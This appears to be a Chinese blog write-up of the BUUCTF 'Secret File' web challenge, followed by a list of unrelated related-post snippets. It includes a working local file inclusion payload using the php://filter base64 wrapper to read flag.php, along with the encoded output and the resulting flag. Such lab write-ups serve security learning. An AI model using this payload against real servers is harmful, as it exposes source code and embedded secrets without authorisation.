2. 程式人生 > 其它 >【BUUCTF】WEB SECRET FILE

【BUUCTF】WEB SECRET FILE

阿新 發佈:2021-12-11

發現跳轉,修改顏色後發現異常。

跳轉後找到action.php

但是點進去後是end.php

burpsuite抓包:

檢視response,發現一個跳轉的secr3t.php

檢視secr3t.php原始碼,發現flag資訊:

flag.php顯示內容如下:

構造php偽協議,payload

secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

可得:

PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHRpdGxlPkZMQUc8L3RpdGxlPgogICAgPC9oZWFkPgoKICAgIDxib2R5IHN0eWxlPSJiYWNrZ3JvdW5kLWNvbG9yOmJsYWNrOyI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPGgxIHN0eWxlPSJmb250LWZhbWlseTp2ZXJkYW5hO2NvbG9yOnJlZDt0ZXh0LWFsaWduOmNlbnRlcjsiPuWViuWTiO+8geS9oOaJvuWIsOaIkeS6hu+8geWPr+aYr+S9oOeci+S4jeWIsOaIkVFBUX5+fjwvaDE+PGJyPjxicj48YnI+CiAgICAgICAgCiAgICAgICAgPHAgc3R5bGU9ImZvbnQtZmFtaWx5OmFyaWFsO2NvbG9yOnJlZDtmb250LXNpemU6MjBweDt0ZXh0LWFsaWduOmNlbnRlcjsiPgogICAgICAgICAgICA8P3BocAogICAgICAgICAgICAgICAgZWNobyAi5oiR5bCx5Zyo6L+Z6YeMIjsKICAgICAgICAgICAgICAgICRmbGFnID0gJ2ZsYWd7ZTM1OTM0YjItMjU1OS00Y2RjLWIzMDQtYTBhMGU1ZjJlZDNhfSc7CiAgICAgICAgICAgICAgICAkc2VjcmV0ID0gJ2ppQW5nX0x1eXVhbl93NG50c19hX2cxcklmcmkzbmQnCiAgICAgICAgICAgID8+CiAgICAgICAgPC9wPgogICAgPC9ib2R5PgoKPC9odG1sPgo=

base64線上解碼:

flag為:

flag{e35934b2-2559-4cdc-b304-a0a0e5f2ed3a}

相關推薦

BUUCTFWEB SECRET FILE

發現跳轉,修改顏色後發現異常。 跳轉後找到action.php 但是點進去後是end.php burpsuite抓包:

BUUCTFWEB篇1:[HCTF 2018]WarmUp

來源:BUUCTF 進入頁面: F12檢視原始碼: <!DOCTYPE html> <html lang=\"en\"> <head>

譯文web audio api 入門

原文地址: Getting Started with Web Audio API 在html5 <audio> 之前,打破web上的寧靜需要引入flash或者其他外掛。即使在web上不需要別的外掛,audio標籤在實現複雜遊戲和互動應用時也帶來了明顯的限制。

BUUCTF第三天

第一題大白 下載是個圖片老規矩用winhex開啟檢視發現png的高和寬不一樣 修改他的高度與寬度相等得到flag

BUUCTF第五天

1.鏡子裡面的世界 根據提示用stegsolve直接檢視圖片 然後發現在red=0 blue=0 green=0是有一些微小的字出現於是用data extract檢視得到flag

BUUCTF---[護網杯 2018]easy_tornado---模板注入

一、思路 1、題目名字tornado 應該是python寫的一個伺服器框架,涉及到python多數都和模板注入有關。

效能web頁面效能之lighthouse使用

1、lighthouse指標 1.1、效能(Performance) 1、FCP(First Contentful Paint) FCP度量使用者導航到您的頁面後瀏覽器呈現第一塊DOM內容所花費的時間。頁面上的影象、非白色的<canvas>元素和svg被認為是DOM內

轉載web 部署專題(一):Gunicorn執行與配置方法

Gunicorn“綠色獨角獸”是一個被廣泛使用的高效能的Python WSGI UNIX HTTP伺服器,移植自Ruby的獨角獸(Unicorn )專案,使用pre-fork worker模式,具有使用非常簡單,輕量級的資源消耗,以及高效能等特點。

CTFshowWeb入門-php特性(89-101) wp

前言 感覺瞭解php特性是基礎,所以決定先做這部分。 Web89(preg_match和intval) 兩步,繞過正則,intval不為0。採取傳入陣列的方式繞過:

[BUUCTF][Web][極客大挑戰 2019]Secret File 1

開啟靶機對應的url 右鍵檢視網頁原始碼,檢視到一個訪問路徑 /Archive_room.php 構造url訪問一下

ASP.NET Core Web APIs(三):使用ASP.NET Core建立Web APIs 下篇

Multipart/form-data 請求推斷 當一個Action方法的引數被標記為[FromForm]特性時,[ApiController]特性會應用一個推斷規則,此時,請求Content-Type被推斷為multipart/form-data。

ASP.NET Core Web APIs(四):教程:使用ASP.NET Core 建立一個Web API

本教程將介紹使用ASP.NET Core建立一個Web API的基礎知識。 在本教程中,你將學到如何:

SpringBoot框架學習Web容器 的切換 詳解

SpringBoot 支援的Web容器: 在springBoot框架中,支援了3個Web容器: Spring Boot支援的Web容器:

一、pytest實戰--Web測試搭建環境

目錄新建虛擬環境selenium vs puppeteerpyppeteerpytest-asyncio總結 從今天起,我們從零開始完整地實踐一個Web的自動化測試專案。

qt 實現MVC Api控制器開發 web api介面-連載5-企業級系統開發實戰連載系列 -技術棧(vue、element-ui、qt、c++、sqlite)

作者背景描述: 本人就職於外資IT企業,擔任電商訂單處理產品開發經理一職,領導過非常多次大小專案的開發工作,對電商平臺訂單處理流程非常熟悉。

持久化框架SpringMVC+Spring4+Mybatis3整合,開發簡單Web專案+原始碼下載

>>> 第一步:建立資料庫表 在Navicat下執行如下sql命令建立資料庫mybatis和表t_user

轉載基於HTTP協議之WEB訊息實時推送技術原理及實現

>>> 基於HTTP協議之WEB訊息實時推送技術原理及實現技術 maybe yes 發表於2014-11-22 18:41

程式人生Web前端工程師崗位分析報告

Web前端工程師崗位分析報告 報告說明: 一、分析目標 第一:分析Web前端工程師崗位涉及的技能需求第二:分析Web前端工程師崗位的招聘需求和薪資情況

原創python+selenium+ddt+unittest實現web功能自動化測試

前期準備: pip install selenium pip install ddt 以下程式碼實現內容: 對頁面提交表單時帶有特殊字元情況的驗證

使用Web API分析器

原文連結:傳送門。 ASP.NET Core 2.2及後續版本提供了一個MVC分析器包,其目的是與API專案一起使用。